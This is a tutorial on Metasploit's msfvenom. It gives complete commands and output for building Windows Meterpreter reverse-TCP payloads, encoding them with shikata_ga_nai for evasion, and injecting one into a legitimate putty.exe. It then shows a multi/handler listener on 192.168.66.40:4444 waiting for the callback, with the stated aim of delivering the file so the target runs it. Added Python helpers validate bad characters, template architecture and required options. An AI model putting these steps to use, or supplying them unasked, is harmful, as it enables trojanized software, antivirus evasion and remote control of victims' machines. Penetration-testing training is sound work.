msfvenom in detail

Introduction to msfvenom

metasploit-framework's msfpayload (the payload generator) and msfencode (the encoder) were merged into a single tool, msfvenom. (msfcli, the old one-shot command-line interface, was retired separately and is not part of msfvenom; `msfconsole -x` took its place.)
msfvenom is used to generate a malicious program, run it on the target machine, and catch the connection with a listener on the attacker's side.

msfvenom parameters

help

> msfvenom -h
DL is deprecated, please use Fiddle
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: F:/Tools/PentestBox/bin/metasploit-framework/msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

Parameters:

-p  choose the payload
    --payload-options  list the payload's standard options
-l  list modules of a type (payloads, encoders, nops, all)
-n  prepend a NOP sled of the given length (padding so an imprecise jump still lands; not an evasion technique by itself)
-f  output format
-e  encoder to use
-a  architecture
    --platform  platform of the payload
    --help-platforms  list available platforms
-s  maximum size of the resulting payload
    --encoder-space  maximum size of the encoded payload (defaults to the -s value)
-b  bytes that must not appear in the output, e.g. '\x00\xff'
-i  number of times to encode the payload
-c  an additional win32 shellcode file to include
-x  custom executable to use as a template
-k  preserve the template's behaviour and inject the payload as a new thread
-o  save the payload to this path
-v  custom variable name for certain output formats
    --smallest  generate the smallest possible payload
-h  help

Common invocation patterns

Simplest form

msfvenom -p <payload> <payload options> -f <format> -o <path>

Test:

> msfvenom -p windows/x64/vncinject/bind_ipv6_tcp -f exe -o payload.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 486 bytes
Final size of exe file: 7168 bytes
Saved as: payload.exe

Encoded form

msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

Test:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 -f exe -o encoder.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 73802 bytes
Saved as: encoder.exe
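Encoding is usually done to get rid of bytes the delivery path cannot carry (the -b list), so it is worth checking the result before it goes anywhere. The script below is an added example, not code from the original article or from Metasploit: it reads the text msfvenom writes with -f python or -f c (both formats spell every byte as \xNN), reads a -b specification the same way, and reports the offset of every forbidden byte. The two embedded samples are constructed to show the shape of those formats; their bytes are illustrative, not a real payload.

```python
import re

# Constructed sample in the shape of `msfvenom -f python` output (illustrative
# bytes, not a real payload). It deliberately contains three NUL bytes.
SAMPLE_PYTHON_OUTPUT = r'''buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
'''

# Constructed sample in the shape of `msfvenom -f c` output, same bytes.
SAMPLE_C_OUTPUT = r'''unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51"
"\x56\x48\x31\xd2\x65\x48\x8b\x52";
'''

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_escaped_bytes(text: str) -> bytes:
    """Collect every \\xNN escape in the text, in order, into raw bytes.

    Works for the python and c output formats, which emit each byte as \\xNN;
    it does not understand formats such as csharp (0xNN) or hex.
    """
    return bytes.fromhex("".join(_HEX_ESCAPE.findall(text)))


def parse_badchars(spec: str) -> bytes:
    """Parse a -b specification such as '\\x00\\x0a\\x0d' into bytes."""
    bad = parse_escaped_bytes(spec)
    if not bad:
        raise ValueError("bad-char spec contains no \\xNN escapes: %r" % spec)
    return bad


def find_badchars(payload: bytes, bad: bytes):
    """Return (offset, byte) pairs for every payload byte listed in `bad`."""
    badset = set(bad)
    return [(i, b) for i, b in enumerate(payload) if b in badset]


def check_output(text: str, badspec: str) -> dict:
    """Parse msfvenom text output and report whether it is clean for -b badspec."""
    payload = parse_escaped_bytes(text)
    hits = find_badchars(payload, parse_badchars(badspec))
    return {"size": len(payload), "clean": not hits, "hits": hits}


if __name__ == "__main__":
    # Real use: msfvenom ... -b '\x00\x0a\x0d' -f python | python3 badchars.py
    for name, sample in (("python", SAMPLE_PYTHON_OUTPUT), ("c", SAMPLE_C_OUTPUT)):
        print(name, check_output(sample, r"\x00\x0a\x0d"))
```

The unencoded sample fails the check at offsets 7, 8 and 9 (the three NUL bytes); after an encoder such as x86/shikata_ga_nai has been applied with the same -b list, the same check should report clean. Note that the check only covers the raw shellcode text, not the bytes of a wrapping exe template.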

Injected into an exe template, plus encoding

msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -x <template> -k -f <format> -o <path>

(-k takes no argument; it keeps the template's original behaviour and runs the payload in a new thread. Without -k the template's entry point is replaced and the original program no longer runs. The template must be the same architecture as the payload.)

Test:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 -x 'F:/putty.exe' -f exe -o injection.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 6144 bytes
Saved as: injection.exe

Concatenated form (extra shellcode prepended with -c)

msfvenom -c <shellcode> -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -f <format> -o <path>

(-c expects a file containing raw win32 shellcode, such as the output of an earlier msfvenom run with -f raw, not a complete exe; the test below feeds it an exe and msfvenom does not validate that.)

Test:

> msfvenom -c "win.exe" -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -i 3 -x 'F:/putty.exe' -f exe -o injection.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Adding shellcode from win.exe to the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 5794 (iteration=0)
x86/shikata_ga_nai succeeded with size 5823 (iteration=1)
x86/shikata_ga_nai succeeded with size 5852 (iteration=2)
x86/shikata_ga_nai chosen with final size 5852
Payload size: 5852 bytes
Final size of exe file: 11264 bytes
Saved as: injection.exe

Generating a payload

The options that matter most are -p and -a; use -l payloads to list the available payloads.
Most payload names already encode the architecture (windows/x64/... versus windows/...), so choosing the right payload name is normally enough.

Platforms

> msfvenom --help-platforms

Platforms
        ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe, windows, netware, android, java

payload

At the time of writing there are over 450 payloads, covering the major operating systems (windows/Linux/osx/Android) and several languages (Python/PHP and others).

> msfvenom -l payloads

Search:

msfvenom -l payloads | grep windows | grep x64 | grep tcp

Evasion

The nops option (-n prepends a NOP sled of the chosen generator; a sled only pads the front of the shellcode so that an imprecise jump still lands, it does not by itself hide the payload from antivirus)

> msfvenom -l nops


Framework NOPs (8 total)
========================

    Name             Description
    ----             -----------
    armle/simple     Simple NOP generator
    php/generic      Generates harmless padding for PHP scripts
    ppc/simple       Simple NOP generator
    sparc/random     SPARC NOP generator
    tty/generic      Generates harmless padding for TTY input
    x64/simple       An x64 single/multi byte NOP instruction generator.
    x86/opty2        Opty2 multi-byte NOP generator
    x86/single_byte  Single-byte NOP generator

Payload generator Veil-Evasion (better evasion results)
https://github.com/Veil-Framework/Veil-Evasion
Now Veil 3.0

Encoding

Available encoders

> msfvenom -l encoders


Of these, two are ranked excellent:

x86/shikata_ga_nai
cmd/powershell_base64

System architecture

Arch

Arch: x86     the payload runs only in a 32-bit process (a 32-bit process on 64-bit Windows counts)
Arch: x64     the payload runs only in a 64-bit process
Arch: x86_64  the same thing as x64: Metasploit's older alias for the 64-bit architecture. It does not mean "works on both 32-bit and 64-bit".

Note

Some payloads list both names, Arch: x86_64, x64. That is one architecture under two names, not a choice to make with -a.
-a is needed when the payload itself does not fix the architecture (for example generic or script payloads) or when you want msfvenom to reject a mismatch explicitly.
Also pay attention to size, rank, and exitfunc (the exit technique).

Consistency

The architecture of the template binary (-x), of the payload, and of the target process must all agree (x86 versus x64, where x86_64 is just another name for x64); otherwise generation fails or the payload crashes.
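The template side of that check can be done before calling msfvenom at all. The script below is an added example, not code from the article or from Metasploit: it reads the Machine field of the PE/COFF header of the intended -x template, maps it to x86 or x64, and compares it with the architecture implied by the payload name (windows/x64/... is 64-bit, any other windows/... payload is 32-bit, which is the naming convention of the two payloads shown in the examples below and an assumption for everything else). fake_pe() builds a constructed minimal header so the check can be exercised offline; it is not a loadable executable.

```python
import struct

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664

MACHINE_TO_ARCH = {
    IMAGE_FILE_MACHINE_I386: "x86",
    IMAGE_FILE_MACHINE_AMD64: "x64",
}


def pe_arch(data: bytes) -> str:
    """Return 'x86' or 'x64' for a PE image, based on the COFF Machine field."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)        # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)  # first COFF field
    try:
        return MACHINE_TO_ARCH[machine]
    except KeyError:
        raise ValueError("unsupported Machine value 0x%04x" % machine)


def payload_arch(payload: str) -> str:
    """Assumption: Metasploit names 64-bit Windows payloads windows/x64/...;
    every other windows/... payload is 32-bit."""
    if not payload.startswith("windows/"):
        raise ValueError("only windows/ payloads are handled here")
    return "x64" if payload.startswith("windows/x64/") else "x86"


def template_matches(template: bytes, payload: str) -> bool:
    """True when the -x template and the -p payload are the same architecture."""
    return pe_arch(template) == payload_arch(payload)


def fake_pe(machine: int) -> bytes:
    """Constructed minimal header: MZ magic, e_lfanew, PE signature, Machine.
    Enough for pe_arch(); not a runnable executable."""
    hdr = bytearray(0x40 + 24)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)    # e_lfanew -> PE header at 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x44, machine)
    return bytes(hdr)


if __name__ == "__main__":
    import sys
    # usage: python3 check_template.py <template.exe> <payload>
    payload = sys.argv[2] if len(sys.argv) == 3 else "windows/x64/meterpreter/reverse_tcp"
    if len(sys.argv) == 3:
        with open(sys.argv[1], "rb") as f:
            data = f.read()
    else:
        data = fake_pe(IMAGE_FILE_MACHINE_I386)   # demo: 32-bit template vs x64 payload
    print("template:", pe_arch(data), "payload:", payload_arch(payload),
          "->", "OK" if template_matches(data, payload) else "MISMATCH")
```

Run it against the real template (for instance the putty.exe used in the injection example above) before the msfvenom -x call; a 32-bit putty.exe with windows/x64/meterpreter/reverse_tcp is exactly the mismatch the paragraph above warns about.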

Example 1:
payload/windows/x64/meterpreter_reverse_tcp

> msfvenom -p windows/x64/meterpreter_reverse_tcp --payload-options

Options for payload/windows/x64/meterpreter_reverse_tcp:


       Name: Windows Meterpreter Shell, Reverse TCP Inline x64
     Module: payload/windows/x64/meterpreter_reverse_tcp
   Platform: Windows
       Arch: x64, x86_64
Needs Admin: No
 Total size: 1189423
       Rank: Normal

Provided by:
    OJ Reeves
    sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name        Current Setting  Required  Description
----        ---------------  --------  -----------
EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS                   no        Comma-separate list of extensions to load
EXTINIT                      no        Initialization strings for extensions
LHOST                        yes       The listen address
LPORT       4444             yes       The listen port

Example 2:
windows/x64/meterpreter/reverse_tcp

> msfvenom -p windows/x64/meterpreter/reverse_tcp --payload-options

Options for payload/windows/x64/meterpreter/reverse_tcp:


       Name: Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
     Module: payload/windows/x64/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86_64
Needs Admin: No
 Total size: 449
       Rank: Normal

Provided by:
    skape <mmiller@hick.org>
    sf <stephen_fewer@harmonysecurity.com>
    OJ Reeves

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Inject the meterpreter server DLL via the Reflective

The Arch lines read x64, x86_64 for the first and x86_64 for the second; those are the same 64-bit architecture under two names, so both payloads are 64-bit only.
The difference that does matter is visible in the names and sizes: meterpreter_reverse_tcp (underscore) is the stageless payload carrying the whole Meterpreter at 1189423 bytes, while meterpreter/reverse_tcp (slash) is a 449-byte stager that fetches the Meterpreter DLL from the handler after connecting.
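The --payload-options table is the authoritative list of what must be set, and forgetting a required option such as LHOST is the most common reason a generated payload never calls back. The script below is an added example, not code from the article or from Metasploit: it parses that output (the metadata lines and the "Basic options" table, sliced by the column positions of the table header) and lists the required options that have no default and were not supplied as VAR=VAL. The embedded sample is constructed from the Example 2 output above.

```python
import re

# Constructed from the `--payload-options` output shown for Example 2.
SAMPLE_OPTIONS = """Options for payload/windows/x64/meterpreter/reverse_tcp:


       Name: Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
     Module: payload/windows/x64/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86_64
Needs Admin: No
 Total size: 449
       Rank: Normal

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Inject the meterpreter server DLL via the Reflective
"""


def parse_payload_options(text: str) -> dict:
    """Parse `msfvenom -p <payload> --payload-options` output.

    Returns {"module", "platform", "arch", "rank", "options": {NAME: {...}}}.
    The table is sliced by the column offsets of its header line, so a
    description containing spaces stays intact and an empty Current Setting
    is reported as "".
    """
    lines = text.splitlines()
    parsed = {}
    for key in ("Module", "Platform", "Arch", "Rank"):
        m = re.search(r"^\s*%s:\s*(.+?)\s*$" % key, text, re.M)
        parsed[key.lower()] = m.group(1) if m else None
    try:
        start = next(i for i, l in enumerate(lines) if l.strip() == "Basic options:")
    except StopIteration:
        raise ValueError("no 'Basic options:' table in input")
    header = lines[start + 1]
    cols = [header.index(h) for h in ("Name", "Current Setting", "Required", "Description")]
    bounds = list(zip(cols, cols[1:] + [None]))
    options = {}
    for line in lines[start + 3:]:            # skip the header and its dashed underline
        if not line.strip():
            break                              # a blank line ends the table
        name, current, required, desc = [line[a:b].strip() for a, b in bounds]
        options[name] = {"current": current, "required": required == "yes", "description": desc}
    parsed["options"] = options
    return parsed


def missing_required(parsed: dict, supplied) -> list:
    """Required options with no default that were not given as VAR=VAL tokens."""
    given = {s.split("=", 1)[0].upper() for s in supplied}
    return sorted(n for n, o in parsed["options"].items()
                  if o["required"] and not o["current"] and n.upper() not in given)


if __name__ == "__main__":
    import sys
    # usage: msfvenom -p <payload> --payload-options | python3 check_opts.py LHOST=192.168.66.40
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OPTIONS
    parsed = parse_payload_options(text)
    print("module:", parsed["module"], "arch:", parsed["arch"])
    print("missing required options:", missing_required(parsed, sys.argv[1:]) or "none")
```

With no arguments the sample reports LHOST as missing, which is what the generation step further down supplies with LHOST=192.168.66.40; LPORT and EXITFUNC already have defaults and are only listed when you override them.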

Experiment

Generate the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.66.40 LPORT=4444 -f exe -o win.exe

(LHOST/LPORT are the attacker's listening address and port; the stray "X" and shell redirection of the old msfpayload syntax are not needed with -o.)

The result can additionally be encoded, packed or otherwise processed to evade detection,
then delivered so that the target runs it.

Listening

Set up the handler in msfconsole (the payload, LHOST and LPORT must match what was used when generating win.exe):

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.66.40
lhost => 192.168.66.40
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.66.40:4444
[*] Starting the payload handler...


Verify